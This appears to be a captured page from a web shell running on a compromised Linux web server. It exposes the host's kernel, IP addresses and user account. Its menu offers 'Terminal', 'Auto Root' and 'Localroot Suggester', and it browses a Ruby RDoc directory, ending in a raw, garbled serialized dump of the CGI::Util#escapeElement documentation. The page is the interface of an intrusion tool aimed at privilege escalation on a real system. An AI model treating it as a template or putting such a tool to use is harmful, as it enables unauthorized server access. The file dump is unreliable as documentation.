Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby24 /
share /
ri /
2.4.0 /
system /
CGI /
Util /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Util.ri
1.18
KB
-rw-r--r--
2023-07-26 18:18
escape-i.ri
435
B
-rw-r--r--
2023-07-26 18:18
escapeElement-i.ri
1.1
KB
-rw-r--r--
2023-07-26 18:18
escapeHTML-i.ri
581
B
-rw-r--r--
2023-07-26 18:18
escape_element-i.ri
374
B
-rw-r--r--
2023-07-26 18:18
escape_html-i.ri
351
B
-rw-r--r--
2023-07-26 18:18
h-i.ri
261
B
-rw-r--r--
2023-07-26 18:18
pretty-i.ri
808
B
-rw-r--r--
2023-07-26 18:18
rfc1123_date-i.ri
500
B
-rw-r--r--
2023-07-26 18:18
unescape-i.ri
479
B
-rw-r--r--
2023-07-26 18:18
unescapeElement-i.ri
820
B
-rw-r--r--
2023-07-26 18:18
unescapeHTML-i.ri
564
B
-rw-r--r--
2023-07-26 18:18
unescape_element-i.ri
382
B
-rw-r--r--
2023-07-26 18:18
unescape_html-i.ri
359
B
-rw-r--r--
2023-07-26 18:18
Save
Rename
U:RDoc::AnyMethod[iI"escapeElement:EFI"CGI::Util#escapeElement;TF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"?Escape only the tags of certain HTML elements in +string+.;To:RDoc::Markup::BlankLine o; ; [ I"FTakes an element or elements or array of elements. Each element ;TI"Fis specified by the name of the element, without angle brackets. ;TI"BThis matches both the start and the end tag of that element. ;TI"BThe attribute list of the open tag will also be escaped (for ;TI"?instance, the double-quotes surrounding attribute values).;T@o:RDoc::Markup::Verbatim; [ I"Dprint CGI::escapeElement('<BR><A HREF="url"></A>', "A", "IMG") ;TI"7 # "<BR><A HREF="url"></A>" ;TI" ;TI"Fprint CGI::escapeElement('<BR><A HREF="url"></A>', ["A", "IMG"]) ;TI"6 # "<BR><A HREF="url"></A>";T:@format0: @fileI"lib/cgi/util.rb;T:0@omit_headings_from_table_of_contents_below000[[I"escape_element;Fo;; [o; ; [I"(Synonym for CGI::escapeElement(str);T;@;0I"(string, *elements);T@FI" Util;FcRDoc::NormalModule00